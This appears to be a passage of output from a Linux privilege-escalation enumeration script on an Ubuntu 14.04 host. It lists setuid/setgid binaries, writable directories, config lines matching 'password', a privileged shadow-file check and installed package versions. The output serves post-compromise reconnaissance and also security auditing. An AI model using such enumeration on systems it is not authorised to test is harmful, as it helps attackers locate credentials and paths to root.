-rwxr-sr-x 1 root tty 18056 Apr 16 2014 /usr/bin/wall
-rwsr-xr-x 1 root root 18136 Mar 15 2014 /usr/bin/traceroute6.iputils
-rwxr-sr-x 1 root mlocate 34452 Jun 20 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 34824 Feb 9 2013 /usr/bin/crontab
-rwxr-sr-x 1 root utmp 406700 Nov 7 2013 /usr/bin/screen
-rwsr-xr-x 1 root root 66252 Feb 17 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 Feb 10 2014 /usr/bin/sudo
-rwsr-xr-x 1 root root 18168 Feb 11 2014 /usr/bin/pkexec
-rwsr-xr-x 1 root root 35916 Feb 17 2014 /usr/bin/chsh
-rwxr-sr-x 1 root tty 9748 Jun 4 2013 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwxr-sr-x 1 root ssh 329144 Apr 14 2014 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mail 13960 Dec 7 2013 /usr/bin/dotlockfile
-rwsr-xr-x 1 root root 45420 Feb 17 2014 /usr/bin/passwd
-rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-unlock
-rwsr-xr-x 1 root root 44620 Feb 17 2014 /usr/bin/chfn
-rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-lock
-rwxr-sr-x 1 root shadow 49420 Feb 17 2014 /usr/bin/chage
-rwsr-xr-x 1 root root 30984 Feb 17 2014 /usr/bin/newgrp
-rwxr-sr-x 1 root shadow 18208 Feb 17 2014 /usr/bin/expiry
drwxrwsr-x 3 root staff 4096 Apr 25 2014 /usr/local/lib/python3.4
drwxrwsr-x 2 root staff 4096 Apr 16 2014 /usr/local/lib/python3.4/dist-packages
drwxrwsr-x 4 root staff 4096 Apr 25 2014 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 5 root staff 4096 Apr 26 2014 /usr/local/lib/python2.7/dist-packages
drwxr-sr-x 2 root staff 4096 Apr 26 2014 /usr/local/lib/python2.7/dist-packages/beautifulsoup4-4.3.2.egg-info
drwxr-sr-x 4 root staff 4096 Apr 26 2014 /usr/local/lib/python2.7/dist-packages/bs4
drwxr-sr-x 2 root staff 4096 Apr 26 2014 /usr/local/lib/python2.7/dist-packages/bs4/tests
drwxr-sr-x 2 root staff 4096 Apr 26 2014 /usr/local/lib/python2.7/dist-packages/bs4/builder
drwxr-sr-x 2 root staff 4096 Apr 26 2014 /usr/local/lib/python2.7/dist-packages/BeautifulSoup-3.2.1.egg-info
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/ca-certificates
drwxrwsr-x 6 root staff 4096 Apr 25 2014 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/xml/declaration
drwxrwsr-x 7 root staff 4096 Apr 25 2014 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Apr 25 2014 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Apr 26 2014 /usr/local/share/fonts
-rwsr-xr-x 1 root root 5480 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Apr 14 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 317568 Apr 2 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9612 Apr 12 2014 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 9804 Feb 11 2014 /usr/lib/policykit-1/polkit-agent-helper-1
[+] Logs containing keyword 'password'
/var/log/bootstrap.log:Shadow passwords are now on.
[+] Config files containing keyword 'password'
/etc/ltrace.conf:; pwd.h
/etc/mongodb.conf:# SSL Key file and password
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
accountsservice 0.6.35-0ubuntu7 query and manipulate user account information
acpid 1:2.0.21-1ubuntu2 Advanced Configuration and Power Interface event daemon
adduser 3.113+nmu3ubuntu3 add and remove users and groups
apparmor 2.8.95~2430-0ubuntu5 User-space parser utility for AppArmor
apport 2.14.1-0ubuntu3 automatically generate crash reports for debugging
apport-symptoms 0.20 symptom scripts for apport
apt 1.0.1ubuntu2 commandline package manager
apt-transport-https 1.0.1ubuntu2 https download transport for APT
apt-utils 1.0.1ubuntu2 package management related utility programs
apt-xapian-index 0.45ubuntu4 maintenance and search tools for a Xapian index of Debian packages
aptitude 0.6.8.2-1ubuntu4 terminal-based package manager
aptitude-common 0.6.8.2-1ubuntu4 architecture indepedent files for the aptitude package manager
at 3.1.14-1ubuntu1 Delayed job execution and batch processing
base-files 7.2ubuntu5 Debian base system miscellaneous files
base-passwd 3.5.33 Debian base system master password and group files
bash 4.3-6ubuntu1 GNU Bourne Again SHell
bash-completion 1:2.1-4 programmable completion for the bash shell
bc 1.06.95-8ubuntu1 GNU bc arbitrary precision calculator language
bind9-host 1:9.9.5.dfsg-3 Version of 'host' bundled with BIND 9.X
binutils 2.24-5ubuntu3 GNU assembler, linker and binary utilities
biosdevname 0.4.1-0ubuntu6 apply BIOS-given names to network devices
bsdmainutils 9.0.5ubuntu1 collection of more utilities from FreeBSD
bsdutils 1:2.20.1-5.1ubuntu20 Basic utilities from 4.4BSD-Lite
build-essential 11.6ubuntu6 Informational list of build-essential packages
busybox-initramfs 1:1.21.0-1ubuntu1 Standalone shell setup for initramfs
busybox-static 1:1.21.0-1ubuntu1 Standalone rescue shell with tons of builtin utilities
byobu 5.77-0ubuntu1 powerful, text based window manager and shell multiplexer
bzip2 1.0.6-5 high-quality block-sorting file compressor - utilities
ca-certificates 20130906ubuntu2 Common CA certificates
command-not-found 0.3ubuntu12 Suggest installation of packages in interactive bash sessions
command-not-found-data 0.3ubuntu12 Set of data files for command-not-found.
console-setup 1.70ubuntu8 console font and keymap setup program
coreutils 8.21-1ubuntu5 GNU core utilities
cpio 2.11+dfsg-1ubuntu1 GNU cpio -- a program to manage archives of files
cpp 4:4.8.2-1ubuntu6 GNU C preprocessor (cpp)
cpp-4.8 4.8.2-19ubuntu1 GNU C preprocessor
crda 1.1.2-1ubuntu2 wireless Central Regulatory Domain Agent
cron 3.0pl1-124ubuntu2 process scheduling daemon
curl 7.35.0-1ubuntu2 command line tool for transferring data with URL syntax
dash 0.5.7-4ubuntu1 POSIX-compliant shell
dbus 1.6.18-0ubuntu4 simple interprocess messaging system (daemon and utilities)
debconf 1.5.51ubuntu2 Debian configuration management system
debconf-i18n 1.5.51ubuntu2 full internationalization support for debconf
debianutils 4.4 Miscellaneous utilities specific to Debian
dh-python 1.20140128-1ubuntu8 Debian helper tools for packaging Python libraries and applications
diffutils 1:3.3-1 File comparison utilities
dmidecode 2.12-2 SMBIOS/DMI table decoder
dmsetup 2:1.02.77-6ubuntu2 Linux Kernel Device Mapper userspace library
dnsutils 1:9.9.5.dfsg-3 Clients provided with BIND
dosfstools 3.0.26-1 utilities for making and checking MS-DOS FAT filesystems
dpkg 1.17.5ubuntu5 Debian package management system
dpkg-dev 1.17.5ubuntu5 Debian package development tools
e2fslibs:i386 1.42.9-3ubuntu1 ext2/ext3/ext4 file system libraries
e2fsprogs 1.42.9-3ubuntu1 ext2/ext3/ext4 file system utilities
ed 1.9-2 classic UNIX line editor
eject 2.1.5+deb1+cvs20081104-13.1 ejects CDs and operates CD-Changers under Linux
ethtool 1:3.13-1 display or change Ethernet device settings
fakeroot 1.20-3ubuntu2 tool for simulating superuser privileges
file 1:5.14-2ubuntu3 Determines file type using "magic" numbers
findutils 4.4.2-7 utilities for finding files--find, xargs
fontconfig-config 2.11.0-0ubuntu4 generic font configuration library - configuration
fonts-dejavu-core 2.34-1ubuntu1 Vera font family derivate with additional characters
fonts-ubuntu-font-family-console 0.80-0ubuntu6 Ubuntu Font Family Linux console fonts, sans-serif monospace
friendly-recovery 0.2.25 Make recovery more user-friendly
ftp 0.17-28 classical file transfer client
fuse 2.9.2-4ubuntu4 Filesystem in Userspace
g++ 4:4.8.2-1ubuntu6 GNU C++ compiler
g++-4.8 4.8.2-19ubuntu1 GNU C++ compiler
gawk 1:4.0.1+dfsg-2.1ubuntu2 GNU awk, a pattern scanning and processing language
gcc 4:4.8.2-1ubuntu6 GNU C compiler
gcc-4.8 4.8.2-19ubuntu1 GNU C compiler
gcc-4.8-base:i386 4.8.2-19ubuntu1 GCC, the GNU Compiler Collection (base package)
gcc-4.9-base:i386 4.9-20140406-0ubuntu1 GCC, the GNU Compiler Collection (base package)
geoip-database 20140313-1 IP lookup command line tools that use the GeoIP library (country database)
gettext-base 0.18.3.1-1ubuntu2 GNU Internationalization utilities for the base system
gir1.2-glib-2.0 1.40.0-1 Introspection data for GLib, GObject, Gio and GModule
gnupg 1.4.16-1ubuntu2 GNU privacy guard - a free PGP replacement
gpgv 1.4.16-1ubuntu2 GNU privacy guard - signature verification tool
grep 2.16-1 GNU grep, egrep and fgrep
groff-base 1.22.2-5 GNU troff text-formatting system (base system components)
grub-common 2.02~beta2-9 GRand Unified Bootloader (common files)
grub-gfxpayload-lists 0.6 GRUB gfxpayload blacklist
grub-pc 2.02~beta2-9 GRand Unified Bootloader, version 2 (PC/BIOS version)
grub-pc-bin 2.02~beta2-9 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
grub2-common 2.02~beta2-9 GRand Unified Bootloader (common files for version 2)
gzip 1.6-3ubuntu1 GNU compression utilities
hdparm 9.43-1ubuntu3 tune hard disk parameters for high performance
hostname 3.15ubuntu1 utility to set/show the host name or domain name
ifupdown 0.7.47.2ubuntu4 high level tools to configure network interfaces
info 5.2.0.dfsg.1-2 Standalone GNU Info documentation browser
init-system-helpers 1.14 helper tools for all init systems
initramfs-tools 0.103ubuntu4 tools for generating an initramfs
initramfs-tools-bin 0.103ubuntu4 binaries used by initramfs-tools
initscripts 2.88dsf-41ubuntu6 scripts for initializing and shutting down the system
insserv 1.14.0-5ubuntu2 boot sequence organizer using LSB init.d script dependency information
install-info 5.2.0.dfsg.1-2 Manage installed documentation in info format
installation-report 2.54ubuntu1 system installation report
iproute2 3.12.0-2 networking and traffic control tools
iptables 1.4.21-1ubuntu1 administration tools for packet filtering and NAT
iputils-ping 3:20121221-4ubuntu1 Tools to test the reachability of network hosts
iputils-tracepath 3:20121221-4ubuntu1 Tools to trace the network path to a remote host
irqbalance 1.0.6-2 Daemon to balance interrupts for SMP systems
isc-dhcp-client 4.2.4-7ubuntu12 ISC DHCP client
isc-dhcp-common 4.2.4-7ubuntu12 common files used by all the isc-dhcp* packages
iso-codes 3.52-1 ISO language, territory, currency, script codes and their translations
kbd 1.15.5-1ubuntu1 Linux console font and keytable utilities
keyboard-configuration 1.70ubuntu8 system-wide keyboard preferences
klibc-utils 2.0.3-0ubuntu1 small utilities built with klibc for early boot
kmod 15-0ubuntu6 tools for managing Linux kernel modules
krb5-locales 1.12+dfsg-2ubuntu4 Internationalization support for MIT Kerberos
landscape-common 14.01-0ubuntu3 The Landscape administration system client - Common files
language-pack-en 1:14.04+20140410 translation updates for language English
language-pack-en-base 1:14.04+20140410 translations for language English
language-selector-common 0.129 Language selector for Ubuntu
laptop-detect 0.13.7ubuntu2 attempt to detect a laptop
less 458-2 pager program similar to more
libaccountsservice0:i386 0.6.35-0ubuntu7 query and manipulate user account information - shared libraries
libacl1:i386 2.2.52-1 Access control list shared library
libalgorithm-diff-perl 1.19.02-3 module to find differences between files
libalgorithm-diff-xs-perl 0.04-2build4 module to find differences between files (XS accelerated)
libalgorithm-merge-perl 0.08-2 Perl module for three-way merge of textual data
libapparmor-perl 2.8.95~2430-0ubuntu5 AppArmor library Perl bindings
libapparmor1:i386 2.8.95~2430-0ubuntu5 changehat AppArmor library
libapt-inst1.5:i386 1.0.1ubuntu2 deb package format runtime library
libapt-pkg4.12:i386 1.0.1ubuntu2 package management runtime library
libarchive-extract-perl 0.70-1 generic archive extracting module
libasan0:i386 4.8.2-19ubuntu1 AddressSanitizer -- a fast memory error detector
libasn1-8-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - ASN.1 library
libasprintf0c2:i386 0.18.3.1-1ubuntu2 GNU library to use fprintf and friends in C++
libatomic1:i386 4.8.2-19ubuntu1 support library providing __atomic built-in functions
libattr1:i386 1:2.4.47-1ubuntu1 Extended attribute shared library
libaudit-common 1:2.3.2-2ubuntu1 Dynamic library for security auditing - common files
libaudit1:i386 1:2.3.2-2ubuntu1 Dynamic library for security auditing
libbind9-90 1:9.9.5.dfsg-3 BIND9 Shared Library used by BIND
libblkid1:i386 2.20.1-5.1ubuntu20 block device id library
libboost-dev 1.54.0.1ubuntu1 Boost C++ Libraries development files (default version)
libboost-filesystem1.54.0:i386 1.54.0-4ubuntu3 filesystem operations (portable paths, iteration over directories, etc) in C++
libboost-iostreams1.54.0:i386 1.54.0-4ubuntu3 Boost.Iostreams Library
libboost-program-options1.54.0:i386 1.54.0-4ubuntu3 program options library for C++
libboost-system1.54.0:i386 1.54.0-4ubuntu3 Operating system (e.g. diagnostics support) library
libboost-thread1.54.0:i386 1.54.0-4ubuntu3 portable C++ multi-threading
libboost1.54-dev 1.54.0-4ubuntu3 Boost C++ Libraries development files
libbsd0:i386 0.6.0-2ubuntu1 utility functions from BSD systems - shared library
libbz2-1.0:i386 1.0.6-5 high-quality block-sorting file compressor library - runtime
libc-bin 2.19-0ubuntu6 Embedded GNU C Library: Binaries
libc-dev-bin 2.19-0ubuntu6 Embedded GNU C Library: Development binaries
libc6:i386 2.19-0ubuntu6 Embedded GNU C Library: Shared libraries
libc6-dev:i386 2.19-0ubuntu6 Embedded GNU C Library: Development Libraries and Header Files
libcap-ng0 0.7.3-1ubuntu2 An alternate POSIX capabilities library
libcap2:i386 1:2.24-0ubuntu2 support for getting/setting POSIX.1e capabilities
libcap2-bin 1:2.24-0ubuntu2 basic utility programs for using capabilities
libcgmanager0:i386 0.24-0ubuntu5 Central cgroup manager daemon (client library)
libck-connector0:i386 0.4.5-3.1ubuntu2 ConsoleKit libraries
libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
libcloog-isl4:i386 0.18.2-1 Chunky Loop Generator (runtime library)
libcomerr2:i386 1.42.9-3ubuntu1 common error description library
libcurl3:i386 7.35.0-1ubuntu2 easy-to-use client-side URL transfer library (OpenSSL flavour)
libcurl3-gnutls:i386 7.35.0-1ubuntu2 easy-to-use client-side URL transfer library (GnuTLS flavour)
libcwidget3 0.5.16-3.5ubuntu1 high-level terminal interface library for C++ (runtime files)
libdb5.3:i386 5.3.28-3ubuntu3 Berkeley v5.3 Database Libraries [runtime]
libdbus-1-3:i386 1.6.18-0ubuntu4 simple interprocess messaging system (library)
libdbus-glib-1-2:i386 0.100.2-1 simple interprocess messaging system (GLib-based shared library)
libdebconfclient0:i386 0.187ubuntu1 Debian Configuration Management System (C-implementation library)
libdevmapper-event1.02.1:i386 2:1.02.77-6ubuntu2 Linux Kernel Device Mapper event support library
libdevmapper1.02.1:i386 2:1.02.77-6ubuntu2 Linux Kernel Device Mapper userspace library
libdns100 1:9.9.5.dfsg-3 DNS Shared Library used by BIND
libdpkg-perl 1.17.5ubuntu5 Dpkg perl modules
libdrm2:i386 2.4.52-1 Userspace interface to kernel DRM services -- runtime
libedit2:i386 3.1-20130712-2 BSD editline and history libraries
libelf1:i386 0.158-0ubuntu5 library to read and write ELF files
libept1.4.12:i386 1.0.12 High-level library for managing Debian package information
libestr0 0.1.9-0ubuntu2 Helper functions for handling strings (lib)
libevent-2.0-5:i386 2.0.21-stable-1ubuntu1 Asynchronous event notification library
libexpat1:i386 2.1.0-4ubuntu1 XML parsing C library - runtime library
libfakeroot:i386 1.20-3ubuntu2 tool for simulating superuser privileges - shared libraries
libffi6:i386 3.1~rc1+r3.0.13-12 Foreign Function Interface library runtime
libfile-fcntllock-perl 0.14-2build1 Perl module for file locking with fcntl(2)
libfontconfig1:i386 2.11.0-0ubuntu4 generic font configuration library - runtime
libfreetype6:i386 2.5.2-1ubuntu2 FreeType 2 font engine, shared library files
libfribidi0:i386 0.19.6-1 Free Implementation of the Unicode BiDi algorithm
libfuse2:i386 2.9.2-4ubuntu4 Filesystem in Userspace (library)
libgc1c2:i386 1:7.2d-5ubuntu2 conservative garbage collector for C and C++
libgcc-4.8-dev:i386 4.8.2-19ubuntu1 GCC support library (development files)
libgcc1:i386 1:4.9-20140406-0ubuntu1 GCC support library
libgck-1-0:i386 3.10.1-1 Glib wrapper library for PKCS#11 - runtime
libgcr-3-common 3.10.1-1 Library for Crypto UI related tasks - common files
libgcr-base-3-1:i386 3.10.1-1 Library for Crypto related tasks
libgcrypt11:i386 1.5.3-2ubuntu4 LGPL Crypto library - runtime library
libgdbm3:i386 1.8.3-12build1 GNU dbm database routines (runtime version)
libgeoip1:i386 1.6.0-1 non-DNS IP-to-country resolver library
libgirepository-1.0-1 1.40.0-1 Library for handling GObject introspection data (runtime library)
libglib2.0-0:i386 2.40.0-2 GLib library of C routines
libglib2.0-data 2.40.0-2 Common files for GLib library
libgmp10:i386 2:5.1.3+dfsg-1ubuntu1 Multiprecision arithmetic library
libgnutls-openssl27:i386 2.12.23-12ubuntu2 GNU TLS library - OpenSSL wrapper
libgnutls26:i386 2.12.23-12ubuntu2 GNU TLS library - runtime library
libgomp1:i386 4.8.2-19ubuntu1 GCC OpenMP (GOMP) support library
libgoogle-perftools4 2.1-2ubuntu1 libraries for CPU and heap analysis, plus an efficient thread-caching malloc
libgpg-error0:i386 1.12-0.2ubuntu1 library for common error values and messages in GnuPG components
libgpm2:i386 1.20.4-6.1 General Purpose Mouse - shared library
libgssapi-krb5-2:i386 1.12+dfsg-2ubuntu4 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
libgssapi3-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - GSSAPI support library
libhcrypto4-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - crypto library
libheimbase1-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - Base library
libheimntlm0-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - NTLM support library
libhx509-5-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - X509 support library
libidn11:i386 1.28-1ubuntu2 GNU Libidn library, implementation of IETF IDN specifications
libio-string-perl 1.08-3 Emulate IO::File interface for in-core strings
libisc95 1:9.9.5.dfsg-3 ISC Shared Library used by BIND
libisccc90 1:9.9.5.dfsg-3 Command Channel Library used by BIND
libisccfg90 1:9.9.5.dfsg-3 Config File Handling Library used by BIND
libisl10:i386 0.12.2-1 manipulating sets and relations of integer points bounded by linear constraints
libitm1:i386 4.8.2-19ubuntu1 GNU Transactional Memory Library
libiw30:i386 30~pre9-8ubuntu1 Wireless tools - library
libjson-c2:i386 0.11-3ubuntu1 JSON manipulation library - shared library
libjson0:i386 0.11-3ubuntu1 JSON manipulation library (transitional package)
libk5crypto3:i386 1.12+dfsg-2ubuntu4 MIT Kerberos runtime libraries - Crypto Library
libkeyutils1:i386 1.5.6-1 Linux Key Management Utilities (library)
libklibc 2.0.3-0ubuntu1 minimal libc subset for use with initramfs
libkmod2:i386 15-0ubuntu6 libkmod shared library
libkrb5-26-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - libraries
libkrb5-3:i386 1.12+dfsg-2ubuntu4 MIT Kerberos runtime libraries
libkrb5support0:i386 1.12+dfsg-2ubuntu4 MIT Kerberos runtime libraries - Support library
libldap-2.4-2:i386 2.4.31-1+nmu2ubuntu8 OpenLDAP libraries
liblocale-gettext-perl 1.05-7build3 module using libc functions for internationalization in Perl
liblockfile-bin 1.09-6ubuntu1 support binaries for and cli utilities based on liblockfile
liblockfile1:i386 1.09-6ubuntu1 NFS-safe locking library
liblog-message-simple-perl 0.10-1 simplified interface to Log::Message
liblwres90 1:9.9.5.dfsg-3 Lightweight Resolver Library used by BIND
liblzma5:i386 5.1.1alpha+20120614-2ubuntu2 XZ-format compression library
libmagic1:i386 1:5.14-2ubuntu3 File type determination library using "magic" numbers
libmodule-pluggable-perl 5.1-1 module for giving modules the ability to have plugins
libmount1:i386 2.20.1-5.1ubuntu20 block device id library
libmpc3:i386 1.0.1-1ubuntu1 multiple precision complex floating-point library
libmpdec2:i386 2.4.0-6 library for decimal floating point arithmetic (runtime library)
libmpfr4:i386 3.1.2-1 multiple precision floating-point computation
libncurses5:i386 5.9+20140118-1ubuntu1 shared libraries for terminal handling
libncursesw5:i386 5.9+20140118-1ubuntu1 shared libraries for terminal handling (wide character support)
libnewt0.52:i386 0.52.15-2ubuntu5 Not Erik's Windowing Toolkit - text mode windowing with slang
libnfnetlink0:i386 1.0.1-2 Netfilter netlink library
libnih-dbus1:i386 1.0.3-4ubuntu25 NIH D-Bus Bindings Library
libnih1:i386 1.0.3-4ubuntu25 NIH Utility Library
libnl-3-200:i386 3.2.21-1 library for dealing with netlink sockets
libnl-genl-3-200:i386 3.2.21-1 library for dealing with netlink sockets - generic netlink
libnuma1:i386 2.0.9~rc5-1ubuntu2 Libraries for controlling NUMA policy
libp11-kit0:i386 0.20.2-2ubuntu2 Library for loading and coordinating access to PKCS#11 modules - runtime
libpam-cap:i386 1:2.24-0ubuntu2 PAM module for implementing capabilities
libpam-modules:i386 1.1.8-1ubuntu2 Pluggable Authentication Modules for PAM
libpam-modules-bin 1.1.8-1ubuntu2 Pluggable Authentication Modules for PAM - helper binaries
libpam-runtime 1.1.8-1ubuntu2 Runtime support for the PAM library
libpam-systemd:i386 204-5ubuntu20 system and service manager - PAM module
libpam0g:i386 1.1.8-1ubuntu2 Pluggable Authentication Modules library
libparse-debianchangelog-perl 1.2.0-1ubuntu1 parse Debian changelogs and output them in other formats
libparted0debian1:i386 2.3-19ubuntu1 disk partition manipulator - shared library
libpcap0.8:i386 1.5.3-2 system interface for user-level packet capture
libpci3:i386 1:3.2.1-1ubuntu5 Linux PCI Utilities (shared library)
libpcre3:i386 1:8.31-2ubuntu2 Perl 5 Compatible Regular Expression Library - runtime files
libpcrecpp0:i386 1:8.31-2ubuntu2 Perl 5 Compatible Regular Expression Library - C++ runtime files
libpcsclite1:i386 1.8.10-1ubuntu1 Middleware to access a smart card using PC/SC (library)
libpipeline1:i386 1.3.0-1 pipeline manipulation library
libplymouth2:i386 0.8.8-0ubuntu17 graphical boot animation and logger - shared libraries
libpng12-0:i386 1.2.50-1ubuntu2 PNG library - runtime
libpod-latex-perl 0.61-1 module to convert Pod data to formatted LaTeX
libpolkit-agent-1-0:i386 0.105-4ubuntu2 PolicyKit Authentication Agent API
libpolkit-backend-1-0:i386 0.105-4ubuntu2 PolicyKit backend API
libpolkit-gobject-1-0:i386 0.105-4ubuntu2 PolicyKit Authorization API
libpopt0:i386 1.16-8ubuntu1 lib for parsing cmdline parameters
libprocps3:i386 1:3.3.9-1ubuntu2 library for accessing process information from /proc
libpython-stdlib:i386 2.7.5-5ubuntu3 interactive high-level object-oriented language (default python version)
libpython2.7:i386 2.7.6-8 Shared Python runtime library (version 2.7)
libpython2.7-minimal:i386 2.7.6-8 Minimal subset of the Python language (version 2.7)
libpython2.7-stdlib:i386 2.7.6-8 Interactive high-level object-oriented language (standard library, version 2.7)
libpython3-stdlib:i386 3.4.0-0ubuntu2 interactive high-level object-oriented language (default python3 version)
libpython3.4-minimal:i386 3.4.0-2ubuntu1 Minimal subset of the Python language (version 3.4)
libpython3.4-stdlib:i386 3.4.0-2ubuntu1 Interactive high-level object-oriented language (standard library, version 3.4)
libquadmath0:i386 4.8.2-19ubuntu1 GCC Quad-Precision Math Library
libreadline5:i386 5.2+dfsg-2 GNU readline and history libraries, run-time libraries
libreadline6:i386 6.3-4ubuntu2 GNU readline and history libraries, run-time libraries
libroken18-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - roken support library
librtmp0:i386 2.4+20121230.gitdf6c518-1 toolkit for RTMP streams (shared library)
libsasl2-2:i386 2.1.25.dfsg1-17build1 Cyrus SASL - authentication abstraction library
libsasl2-modules:i386 2.1.25.dfsg1-17build1 Cyrus SASL - pluggable authentication modules
libsasl2-modules-db:i386 2.1.25.dfsg1-17build1 Cyrus SASL - pluggable authentication modules (DB)
libselinux1:i386 2.2.2-1 SELinux runtime shared libraries
libsemanage-common 2.2-1 Common files for SELinux policy management libraries
libsemanage1:i386 2.2-1 SELinux policy management library
libsepol1:i386 2.2-1 SELinux library for manipulating binary security policies
libsigc++-2.0-0c2a:i386 2.2.10-0.2ubuntu2 type-safe Signal Framework for C++ - runtime
libsigsegv2:i386 2.10-2 Library for handling page faults in a portable way
libslang2:i386 2.2.4-15ubuntu1 S-Lang programming library - runtime version
libsnappy1 1.1.0-1ubuntu1 fast compression/decompression library
libsqlite3-0:i386 3.8.2-1ubuntu2 SQLite 3 shared library
libss2:i386 1.42.9-3ubuntu1 command-line interface parsing library
libssl1.0.0:i386 1.0.1f-1ubuntu2 Secure Sockets Layer toolkit - shared libraries
libstdc++-4.8-dev:i386 4.8.2-19ubuntu1 GNU Standard C++ Library v3 (development files)
libstdc++6:i386 4.8.2-19ubuntu1 GNU Standard C++ Library v3
libsub-name-perl 0.05-1build4 module for assigning a new name to referenced sub
libsystemd-daemon0:i386 204-5ubuntu20 systemd utility library
libsystemd-login0:i386 204-5ubuntu20 systemd login utility library
libtasn1-6:i386 3.4-3 Manage ASN.1 structures (runtime)
libtcmalloc-minimal4 2.1-2ubuntu1 efficient thread-caching malloc
libterm-ui-perl 0.42-1 Term::ReadLine UI made easy
libtext-charwidth-perl 0.04-7build3 get display widths of characters on the terminal
libtext-iconv-perl 1.7-5build2 converts between character sets in Perl
libtext-soundex-perl 3.4-1build1 implementation of the soundex algorithm
libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap
libtimedate-perl 2.3000-1 collection of modules to manipulate date/time information
libtinfo5:i386 5.9+20140118-1ubuntu1 shared low-level terminfo library for terminal handling
libudev1:i386 204-5ubuntu20 libudev shared library
libusb-0.1-4:i386 2:0.1.12-23.3ubuntu1 userspace USB programming library
libusb-1.0-0:i386 2:1.0.17-1ubuntu2 userspace USB programming library
libustr-1.0-1:i386 1.0.4-3ubuntu2 Micro string library: shared library
libuuid1:i386 2.20.1-5.1ubuntu20 Universally Unique ID library
libv8-3.14.5 3.14.5.8-5ubuntu2 V8 JavaScript engine - runtime library
libwind0-heimdal:i386 1.6~git20131207+dfsg-1ubuntu1 Heimdal Kerberos - stringprep implementation
libwrap0:i386 7.6.q-25 Wietse Venema's TCP wrappers library
libx11-6:i386 2:1.6.2-1ubuntu2 X11 client-side library
libx11-data 2:1.6.2-1ubuntu2 X11 client-side library
libxapian22 1.2.16-2ubuntu1 Search engine library
libxau6:i386 1:1.0.8-1 X11 authorisation library
libxcb1:i386 1.10-2ubuntu1 X C Binding
libxdmcp6:i386 1:1.1.1-1 X11 Display Manager Control Protocol library
libxext6:i386 2:1.3.2-1 X11 miscellaneous extension library
libxml2:i386 2.9.1+dfsg1-3ubuntu4 GNOME XML library
libxmuu1:i386 2:1.1.1-1 X11 miscellaneous micro-utility library
libxtables10 1.4.21-1ubuntu1 netfilter xtables library
linux-firmware 1.127 Firmware for Linux kernel drivers
linux-generic 3.13.0.24.28 Complete Generic Linux kernel and headers
linux-headers-3.13.0-24 3.13.0-24.46 Header files related to Linux kernel version 3.13.0
